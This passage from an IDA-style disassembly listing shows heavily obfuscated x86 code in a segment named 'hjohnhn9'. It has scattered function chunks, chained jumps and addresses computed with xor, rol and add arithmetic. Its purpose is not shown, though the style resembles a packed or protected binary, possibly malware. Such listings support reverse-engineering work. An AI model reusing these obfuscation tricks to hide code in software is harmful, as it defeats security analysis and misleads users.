; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427AC0
loc_4283A1: ; CODE XREF: sub_427AC0:loc_425C3B�j
xor eax, 0C62E2D94h
add eax, ebp
add eax, 19D39E5Dh
mov eax, [eax]
push esi
mov esi, eax
call sub_42387A
; END OF FUNCTION CHUNK FOR sub_427AC0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_31. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4251EB
loc_4283BA: ; CODE XREF: sub_4251EB+15�j
jmp loc_425FDC
; END OF FUNCTION CHUNK FOR sub_4251EB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426354
loc_4283BF: ; CODE XREF: sub_426354-15D3�j
jmp loc_426E07
; END OF FUNCTION CHUNK FOR sub_426354
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424181
loc_4283C4: ; CODE XREF: sub_424181+7�j
jmp loc_425ED0
; END OF FUNCTION CHUNK FOR sub_424181
; =============== S U B R O U T I N E =======================================
sub_4283C9 proc near ; CODE XREF: hjohnhn9:00425FF2�j
; hjohnhn9:loc_4266BE�j
; DATA XREF: ...
arg_0 = dword ptr 4
add eax, 0E260B5A1h
popf
xchg eax, [esp-4+arg_0]
jmp sub_42897B
sub_4283C9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426708
loc_4283D8: ; CODE XREF: sub_426708-1F54�j
xchg eax, [esp+4+var_4]
jmp sub_424877
; END OF FUNCTION CHUNK FOR sub_426708
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426CE6
loc_4283E0: ; CODE XREF: sub_426CE6:loc_423EC1�j
mov eax, [eax]
push offset loc_426BAD
jmp loc_42376C
; END OF FUNCTION CHUNK FOR sub_426CE6
; ---------------------------------------------------------------------------
adc ebx, 6F014DE4h
jmp sub_426D6A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423CDB
loc_4283F7: ; CODE XREF: sub_423CDB+3066�j
mov eax, [ebp-14h]
mov eax, [eax+18h]
dec eax
test eax, eax
jl loc_4244EE
inc eax
jmp loc_424CA5
; END OF FUNCTION CHUNK FOR sub_423CDB
; ---------------------------------------------------------------------------
adc eax, ecx
jmp sub_42486B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_91. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_428414: ; CODE XREF: hjohnhn9:004242D1�j
jz loc_426EAD
jmp loc_4261F6
; =============== S U B R O U T I N E =======================================
sub_42841F proc near ; CODE XREF: hjohnhn9:004261B7�j
; sub_424A28:loc_42872F�p
; FUNCTION CHUNK AT 00423810 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423D11 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427B02 SIZE 0000000C BYTES
xchg ebx, [esp+0]
pop ebx
mov eax, ds:dword_4233C4
or eax, eax
jnz loc_4260A9
jmp loc_423D11
sub_42841F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428436 proc near ; CODE XREF: sub_4287BF-1234�p
; sub_4287BF:loc_429061�p
push offset sub_424564
jmp loc_42687B
sub_428436 endp
; ---------------------------------------------------------------------------
loc_428440: ; CODE XREF: hjohnhn9:00426C7A�j
jno loc_42344E
popf
; =============== S U B R O U T I N E =======================================
sub_428447 proc near ; CODE XREF: sub_4262C5+1363�p
; FUNCTION CHUNK AT 00423899 SIZE 00000002 BYTES
xchg eax, [esp+0]
pop eax
jnz loc_424E63
mov eax, [ebp-8]
mov byte ptr [eax], 0
mov esp, ebp
jmp loc_423899
sub_428447 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426523
loc_42845E: ; CODE XREF: sub_426523:loc_42628F�j
idiv ecx
mov [ebp-8], eax
push offset loc_426116
jmp loc_427CEC
; END OF FUNCTION CHUNK FOR sub_426523
; ---------------------------------------------------------------------------
loc_42846D: ; CODE XREF: hjohnhn9:00423A26�j
mov ds:dword_423954, eax
jmp loc_42787C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428477 proc near ; CODE XREF: sub_423425�j
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0042395D SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004239D0 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00424ACA SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00424CC8 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00424DE2 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00424E8F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004252C8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004267E0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004279E3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004287A5 SIZE 0000001A BYTES
push ebp
mov ebp, esp
push ecx
jmp loc_4267E0
sub_428477 endp
; ---------------------------------------------------------------------------
push esi
push 87B37D53h
pop esi
or esi, 9B81DE4Ch
rol esi, 1Fh
push ecx
jmp loc_423801
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427F90
loc_428496: ; CODE XREF: sub_427F90:loc_42440F�j
shl [ebp+var_8], 8
jmp loc_427135
; ---------------------------------------------------------------------------
loc_42849F: ; CODE XREF: sub_427F90:loc_428F71�j
mov eax, [ebp+var_C]
call sub_425029
; END OF FUNCTION CHUNK FOR sub_427F90
; START OF FUNCTION CHUNK FOR sub_424A28
loc_4284A7: ; CODE XREF: sub_424A28+30AD�j
jmp loc_428EAA
; END OF FUNCTION CHUNK FOR sub_424A28
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427324
loc_4284AC: ; CODE XREF: sub_427324+10�j
or edx, 27175886h
add edx, 827297C1h
call sub_4279ED
push edx
mov edx, eax
xchg edx, [esp+0]
ror eax, 17h
jmp loc_4279D7
; END OF FUNCTION CHUNK FOR sub_427324
; =============== S U B R O U T I N E =======================================
sub_4284CB proc near ; CODE XREF: sub_42897A�j
; DATA XREF: sub_428965+B�o
; FUNCTION CHUNK AT 00423C85 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425B97 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426559 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00427FBA SIZE 00000014 BYTES
cdq
add eax, [esp+0]
call loc_4244FA
loc_4284D4: ; CODE XREF: hjohnhn9:00428074�j
mov ds:dword_426E3C, eax
lea eax, [ebp-14h]
xor edx, edx
call sub_427AEB
call sub_426749
jmp loc_425B97
sub_4284CB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424161
loc_4284ED: ; CODE XREF: sub_424161+429�j
popf
loc_4284EE: ; CODE XREF: sub_424161:loc_42457E�j
and eax, ds:4000F9h
xor eax, 0E7A8609Ah
add eax, ebp
add eax, 1A458262h
mov eax, [eax]
popf
jmp loc_423B50
; END OF FUNCTION CHUNK FOR sub_424161
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_18. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427486
loc_42850B: ; CODE XREF: sub_427486-2729�j
jmp nullsub_87
; END OF FUNCTION CHUNK FOR sub_427486
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A78
loc_428510: ; CODE XREF: sub_426A78-B4A�j
rol eax, 9
push eax
retn
; END OF FUNCTION CHUNK FOR sub_426A78
; ---------------------------------------------------------------------------
loc_428515: ; CODE XREF: hjohnhn9:004280CD�j
jmp loc_42806F
; =============== S U B R O U T I N E =======================================
sub_42851A proc near ; CODE XREF: sub_4279C0:loc_42446C�p
var_C = dword ptr -0Ch
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423692 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00424603 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042471C SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00424A07 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424D63 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424E76 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00424EF1 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004267CC SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004269E6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427EFB SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00428951 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00429107 SIZE 00000005 BYTES
push eax
mov eax, ebp
jmp loc_424D63
sub_42851A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42345B
loc_428522: ; CODE XREF: sub_42345B+F6D�j
mov edi, eax
pop eax
xor edi, 7AC294Ch
and edi, 0F324205Ah
sub edi, 1CCD31ABh
add edi, 5D0B7FC7h
jmp loc_42827F
; END OF FUNCTION CHUNK FOR sub_42345B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42355C
loc_428542: ; CODE XREF: sub_42355C+26D2�j
ror eax, 11h
mov ds:dword_428B04, eax
retn
; END OF FUNCTION CHUNK FOR sub_42355C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426354
loc_42854C: ; CODE XREF: sub_426354+2868�j
jmp nullsub_96
; END OF FUNCTION CHUNK FOR sub_426354
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426671
loc_428551: ; CODE XREF: sub_426671-64F�j
; sub_42355C+2B31�j
rol eax, 11h
push eax
call sub_4244F5
retn
; END OF FUNCTION CHUNK FOR sub_426671
; =============== S U B R O U T I N E =======================================
sub_42855B proc near ; CODE XREF: sub_4265A0:loc_4270C5�j
; sub_4263E3+1B33�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423320 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042623D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00427DCD SIZE 00000005 BYTES
jns loc_42623D
jmp loc_427DCD
sub_42855B endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_66. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_428567: ; CODE XREF: sub_424631+2A80�j
jmp loc_423E80
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427B7A
loc_42856C: ; CODE XREF: sub_427B7A-101C�j
jmp loc_4235C0
; END OF FUNCTION CHUNK FOR sub_427B7A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4278DC
loc_428571: ; CODE XREF: sub_4278DC-4147�j
jmp loc_42514C
; END OF FUNCTION CHUNK FOR sub_4278DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4265CD
loc_428576: ; CODE XREF: sub_4265CD-2FCE�j
add eax, 0F1EDD6A1h
; END OF FUNCTION CHUNK FOR sub_4265CD
; START OF FUNCTION CHUNK FOR sub_42466E
loc_42857C: ; CODE XREF: sub_42466E:loc_42402C�j
or eax, 1C45DFABh
test eax, 40h
jmp loc_4289F8
; END OF FUNCTION CHUNK FOR sub_42466E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427C9B
loc_42858D: ; CODE XREF: sub_427C9B+13C1�j
jle loc_4271AE
test eax, esi
jmp loc_426176
; END OF FUNCTION CHUNK FOR sub_427C9B
; =============== S U B R O U T I N E =======================================
sub_42859A proc near ; CODE XREF: hjohnhn9:0042360B�j
; sub_428C4E+B�p
; FUNCTION CHUNK AT 00425FA3 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00427886 SIZE 0000000F BYTES
xchg esi, [esp+0]
pop esi
or eax, eax
jnz loc_425FA3
call sub_424877
jmp loc_427886
sub_42859A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
call nullsub_122
push edx
push 5D51C839h
pop edx
jmp loc_42823A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424161
loc_4285C1: ; CODE XREF: sub_424161+4�j
test byte ptr [ebp-8], 40h
jz loc_423C90
push ebp
mov eax, [ebp-20h]
call sub_423CCD
jmp loc_424F86
; END OF FUNCTION CHUNK FOR sub_424161
; ---------------------------------------------------------------------------
locret_4285D9: ; CODE XREF: hjohnhn9:loc_428ECB�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426354
loc_4285DA: ; CODE XREF: sub_426354+13�j
jmp nullsub_58
; END OF FUNCTION CHUNK FOR sub_426354
; =============== S U B R O U T I N E =======================================
sub_4285DF proc near ; CODE XREF: sub_423A75+3755�j
; FUNCTION CHUNK AT 00426A2B SIZE 00000005 BYTES
push ebx
pushf
push offset loc_4242AF
jmp loc_426A2B
sub_4285DF endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B05
loc_4285EB: ; CODE XREF: sub_423B05:loc_4275E9�j
rol eax, 12h
xor eax, 0A572612Ah
add eax, ebp
add eax, 0D2A47652h
mov eax, [eax]
push offset loc_424768
jmp nullsub_59
; END OF FUNCTION CHUNK FOR sub_423B05
; ---------------------------------------------------------------------------
push 0E22750C9h
pop eax
and eax, 0E8C440A5h
add eax, 203E124Fh
mov eax, [eax]
call sub_426BFD
loc_428621: ; CODE XREF: hjohnhn9:00426111�j
jmp loc_423C72
; ---------------------------------------------------------------------------
loc_428626: ; CODE XREF: hjohnhn9:00424B17�j
; hjohnhn9:00426880�j
jmp loc_427CE6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B05
loc_42862B: ; CODE XREF: sub_423B05-8DB�j
jz loc_423C67
jmp loc_425E64
; END OF FUNCTION CHUNK FOR sub_423B05
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424928
loc_428636: ; CODE XREF: sub_424928+12�j
xor esi, 0EC755FA9h
rol esi, 0Ch
jb loc_423984
jp loc_4274DF
push 0ED12CE14h
jmp loc_423984
; END OF FUNCTION CHUNK FOR sub_424928
; ---------------------------------------------------------------------------
loc_428655: ; CODE XREF: hjohnhn9:00426A73�j
sub ebp, 1D877403h
; =============== S U B R O U T I N E =======================================
sub_42865B proc near ; CODE XREF: sub_425029-153D�p
xchg eax, [esp+0]
pop eax
mov eax, [ebp-8]
call sub_428357
loc_428667: ; CODE XREF: sub_424631+2A6B�j
jmp loc_4249A3
sub_42865B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4287BF
loc_42866C: ; CODE XREF: sub_4287BF-5623�j
; sub_4287BF:loc_428888�j
add eax, 5
cmp eax, ds:dword_4252D0
loc_428675: ; CODE XREF: hjohnhn9:00428FC1�j
jz loc_4268DB
loc_42867B: ; CODE XREF: sub_4287BF:loc_42318D�j
; sub_4287BF+8B5�j
jno loc_427246
mov eax, [ebp-4]
call sub_426924
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jmp loc_427234
; END OF FUNCTION CHUNK FOR sub_4287BF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_41. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424928
loc_428696: ; CODE XREF: sub_424928-F95�j
jmp sub_4244F5
; END OF FUNCTION CHUNK FOR sub_424928
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423CDB
loc_42869B: ; CODE XREF: sub_423CDB:loc_425EFB�j
sub edx, 0D48679D9h
and edx, 0F1D0428Eh
loc_4286A7: ; CODE XREF: hjohnhn9:loc_4269B7�j
add edx, 1B9E0E67h
call sub_4279ED
push ecx
push offset sub_42325E
jmp nullsub_65
; END OF FUNCTION CHUNK FOR sub_423CDB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426CC8
loc_4286BD: ; CODE XREF: sub_426CC8:loc_42633F�j
push 49B5FB9h
pop ecx
sub ecx, 9CD41AECh
xor ecx, 32E7C044h
add ecx, 0AB22037Dh
xchg ecx, [esp+4+var_4]
jmp loc_4260B3
; END OF FUNCTION CHUNK FOR sub_426CC8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A55
loc_4286DD: ; CODE XREF: sub_424A55+13�j
jz loc_424C81
inc dword ptr [ebp-8]
; END OF FUNCTION CHUNK FOR sub_424A55
; START OF FUNCTION CHUNK FOR sub_428271
loc_4286E6: ; CODE XREF: sub_424A55+23D�j
; sub_428271:loc_426B92�j
mov eax, [ebp-8]
pop ecx
pop ecx
pop ebp
jmp nullsub_60
; END OF FUNCTION CHUNK FOR sub_428271
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_4286F1: ; CODE XREF: sub_425BD2:loc_424266�j
or edx, 293B973Eh
xor edx, 5CA6FE90h
add edx, ebp
add edx, 0DC26FECDh
mov edx, [edx]
mov [edx], al
jmp loc_4265B8
; END OF FUNCTION CHUNK FOR sub_425BD2
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42870E proc near ; DATA XREF: sub_428192:loc_428253�o
push ebp
mov ebp, esp
mov esp, ebp
call sub_428C4E
sub_42870E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428718 proc near ; CODE XREF: sub_424E4F-966�p
; hjohnhn9:00427F2E�j
xchg ebx, [esp+0]
pop ebx
pop ebp
retn
sub_428718 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42645D
loc_42871E: ; CODE XREF: sub_42645D+D�j
jmp nullsub_62
; END OF FUNCTION CHUNK FOR sub_42645D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424335
loc_428723: ; CODE XREF: sub_424335+B�j
jmp loc_425147
; END OF FUNCTION CHUNK FOR sub_424335
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424E4F
loc_428728: ; CODE XREF: sub_424E4F-978�j
; sub_42392D+1510�j
xor eax, eax
loc_42872A: ; CODE XREF: hjohnhn9:loc_427763�j
jmp loc_4265B3
; END OF FUNCTION CHUNK FOR sub_424E4F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A28
loc_42872F: ; CODE XREF: sub_424A28+6�j
call sub_42841F
loc_428734: ; CODE XREF: hjohnhn9:00428A0F�j
jmp nullsub_63
; END OF FUNCTION CHUNK FOR sub_424A28
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_70. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4260BD
loc_42873A: ; CODE XREF: sub_4260BD+1�j
jmp loc_429032
; END OF FUNCTION CHUNK FOR sub_4260BD
; =============== S U B R O U T I N E =======================================
sub_42873F proc near ; CODE XREF: sub_426A30:loc_4247BC�p
; sub_426A30+13�p
; FUNCTION CHUNK AT 0042322F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042324B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004252D4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427021 SIZE 00000007 BYTES
xor bx, bx
add ebx, 10000h
loc_428748: ; CODE XREF: sub_42873F-550A�j
; sub_42873F:loc_427021�j
jno loc_42324B
sub ebx, 10000h
mov eax, [ebx]
jmp loc_42322F
sub_42873F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426354
loc_42875B: ; CODE XREF: sub_426354:loc_4290A3�j
sub ecx, 5D05A8A1h
cmp ecx, 0AC25379Bh
jmp loc_425F00
; END OF FUNCTION CHUNK FOR sub_426354
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D64
loc_42876C: ; CODE XREF: sub_428D64-4AD4�j
or eax, edx
mov edx, [ebp-8]
loc_428771: ; CODE XREF: sub_425BD2:loc_424454�j
mov [edx], al
mov eax, [ebp-8]
mov al, [eax]
jmp loc_4264EB
; END OF FUNCTION CHUNK FOR sub_428D64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C98
loc_42877D: ; CODE XREF: sub_425C98:loc_4264F0�j
xchg ecx, [esp+0]
ror eax, 7
call sub_426D6A
; END OF FUNCTION CHUNK FOR sub_425C98
; =============== S U B R O U T I N E =======================================
sub_428788 proc near ; CODE XREF: hjohnhn9:00425BED�j
; sub_424631:loc_428124�p
; FUNCTION CHUNK AT 00423610 SIZE 0000000F BYTES
xchg ecx, [esp+0]
pop ecx
mov edx, 0CF0182F6h
call sub_427C53
mov ds:dword_423954, eax
loc_42879B: ; CODE XREF: hjohnhn9:00423A0C�j
; sub_424631+4�j ...
mov eax, ds:dword_423954
jmp loc_423610
sub_428788 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428477
loc_4287A5: ; CODE XREF: sub_428477:loc_4279E3�j
xor eax, 4AF24693h
add eax, ebp
add eax, 6BD28E9Fh
mov eax, [eax]
xchg eax, [esp+8+var_8]
call eax
loc_4287BA: ; CODE XREF: hjohnhn9:00426730�j
jmp loc_4252C8
; END OF FUNCTION CHUNK FOR sub_428477
; =============== S U B R O U T I N E =======================================
sub_4287BF proc near ; DATA XREF: sub_423851+6�o
; FUNCTION CHUNK AT 00423022 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042318D SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042369A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00423767 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427234 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042757E SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0042866C SIZE 00000029 BYTES
; FUNCTION CHUNK AT 00428888 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429061 SIZE 00000022 BYTES
mov eax, [ebp-4]
cmp word ptr [eax], 2ECDh
jz loc_4287D2
jmp loc_423053
; ---------------------------------------------------------------------------
loc_4287D2: ; CODE XREF: sub_423851�j sub_4287BF+8�j
jno loc_427588
mov eax, [ebp-4]
jmp loc_423767
sub_4287BF endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426354
loc_4287E0: ; CODE XREF: sub_426354+128A�j
xor ecx, 0F5929170h
add ecx, ebp
add ecx, 264E3726h
mov [ecx], eax
pop ecx
inc dword ptr [ebp-10h]
cmp dword ptr [ebp-8], 0
jmp loc_427AB5
; END OF FUNCTION CHUNK FOR sub_426354
; ---------------------------------------------------------------------------
sub eax, esi
test ebx, ecx
jmp loc_4269B7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426D02
loc_428806: ; CODE XREF: sub_426D02+A�j
push 4365EA7Eh
pop eax
rol eax, 0Dh
xor eax, 0C8A505A7h
rol eax, 1Dh
add eax, 91853137h
jmp loc_4274D5
; END OF FUNCTION CHUNK FOR sub_426D02
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425029
loc_428823: ; CODE XREF: sub_425029-1536�j
jp loc_42626A
; END OF FUNCTION CHUNK FOR sub_425029
; =============== S U B R O U T I N E =======================================
sub_428829 proc near ; CODE XREF: sub_4262C5+289D�p
xchg ecx, [esp+0]
pop ecx
push 38651AACh
pop ecx
jmp loc_425E3A
sub_428829 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428838 proc near ; CODE XREF: hjohnhn9:00423AFF�j
; hjohnhn9:00427BB8�p
xchg esi, [esp+0]
pop esi
mov al, [eax]
sub al, 99h
mov edx, [ebp-4]
imul byte ptr [edx]
cmp al, 0A4h
push offset sub_423851
jmp nullsub_127
sub_428838 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423CDB
loc_428851: ; CODE XREF: sub_423CDB:loc_424CA5�j
mov [ebp-24h], eax
mov dword ptr [ebp-18h], 0
loc_42885B: ; CODE XREF: sub_425F3F+3�j
mov eax, [ebp-14h]
mov eax, [eax+20h]
add eax, [ebp-4]
xor edx, edx
push edx
call sub_428965
loc_42886C: ; CODE XREF: hjohnhn9:00425B66�j
jmp loc_426B13
; END OF FUNCTION CHUNK FOR sub_423CDB
; ---------------------------------------------------------------------------
loc_428871: ; CODE XREF: hjohnhn9:004272CD�j
and edx, 752A12AAh
cmp edx, 0ED7C7803h
jmp loc_426E70
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_59. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427852
loc_428883: ; CODE XREF: sub_427852+739�j
jmp loc_428EEB
; END OF FUNCTION CHUNK FOR sub_427852
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4287BF
loc_428888: ; CODE XREF: sub_4287BF-123C�j
jmp loc_42866C
; END OF FUNCTION CHUNK FOR sub_4287BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427A36
loc_42888D: ; CODE XREF: sub_4265CD-258E�j
; sub_427A36-1779�j
jmp nullsub_66
; END OF FUNCTION CHUNK FOR sub_427A36
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42345B
loc_428892: ; CODE XREF: hjohnhn9:loc_423604�j
; sub_42345B+3B82�j
pop ecx
sub ecx, 0AEA4A8ACh
xor ecx, ds:4000F7h
rol ecx, 0Eh
and ecx, 2216952Ah
jmp loc_424145
; END OF FUNCTION CHUNK FOR sub_42345B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A30
loc_4288AD: ; CODE XREF: sub_426A30-3794�j
call sub_426859
jnz loc_427181
mov ecx, [ebx+edx-4]
or ecx, ecx
jz loc_4247C1
jmp loc_4247B9
; END OF FUNCTION CHUNK FOR sub_426A30
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428CC9
loc_4288C9: ; CODE XREF: sub_428CC9+E�j
jnz loc_423E25
jmp sub_428E98
; END OF FUNCTION CHUNK FOR sub_428CC9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427486
loc_4288D4: ; CODE XREF: sub_427486-111�j
mov edi, [ecx]
cdq
loc_4288D7: ; CODE XREF: sub_427486:loc_428DEE�j
call sub_428FD3
push 383FE567h
xchg ebp, [esp+0]
mov edx, ebp
pop ebp
add edx, 19F9D197h
jmp loc_428B1C
; END OF FUNCTION CHUNK FOR sub_427486
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_10. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424877
loc_4288F3: ; CODE XREF: sub_424877+1�j
jmp loc_42464A
; END OF FUNCTION CHUNK FOR sub_424877
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424161
loc_4288F8: ; CODE XREF: sub_424161-28F�j
jmp nullsub_68
; END OF FUNCTION CHUNK FOR sub_424161
; ---------------------------------------------------------------------------
xchg edi, ebp
mov edx, [edi]
jmp sub_4264CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427564
loc_428906: ; CODE XREF: sub_427564+81F�j
jge loc_42655C
jno loc_425CE7
loc_428912: ; CODE XREF: sub_427564-3AC6�j
rol edx, 1Bh
add edx, 0AFC6A692h
add edx, ebp
jmp sub_423A75
; END OF FUNCTION CHUNK FOR sub_427564
; ---------------------------------------------------------------------------
loc_428922: ; CODE XREF: hjohnhn9:loc_4264B7�j
pop edx
sub edx, 0DAE6080Fh
rol edx, 2
and edx, 0A9DCFEE7h
rol edx, 0Dh
jmp loc_424941
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424698
loc_42893A: ; CODE XREF: sub_424698+1DD8�j
cmp edx, 11B06969h
jmp loc_423AD2
; END OF FUNCTION CHUNK FOR sub_424698
; =============== S U B R O U T I N E =======================================
sub_428945 proc near ; CODE XREF: sub_424D99-E93�p
; hjohnhn9:00424D87�j
arg_0 = dword ptr 4
xchg edi, [esp+0]
pop edi
xchg ebx, [esp-4+arg_0]
jmp loc_42762D
sub_428945 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42851A
loc_428951: ; CODE XREF: sub_42851A:loc_424D63�j
xchg eax, [esp+0]
mov ebp, esp
push ecx
mov esp, ebp
xchg ecx, [esp+4+var_4]
loc_42895C: ; CODE XREF: sub_426C09+238B�j
mov ebp, ecx
add ecx, ebp
jmp loc_4267CC
; END OF FUNCTION CHUNK FOR sub_42851A
; =============== S U B R O U T I N E =======================================
sub_428965 proc near ; CODE XREF: hjohnhn9:00425CAE�j
; sub_423CDB+4B8C�p
; FUNCTION CHUNK AT 004265BE SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
push eax
mov eax, [ebp-18h]
shl eax, 2
push offset sub_4284CB
jmp loc_4265BE
sub_428965 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42897A proc near ; CODE XREF: sub_42442F:loc_424F52�j
retn
sub_42897A endp
; =============== S U B R O U T I N E =======================================
sub_42897B proc near ; CODE XREF: sub_425CB3:loc_427860�p
; sub_4283C9+A�j
; FUNCTION CHUNK AT 00424A1D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424F5C SIZE 0000001A BYTES
jz sub_42363F
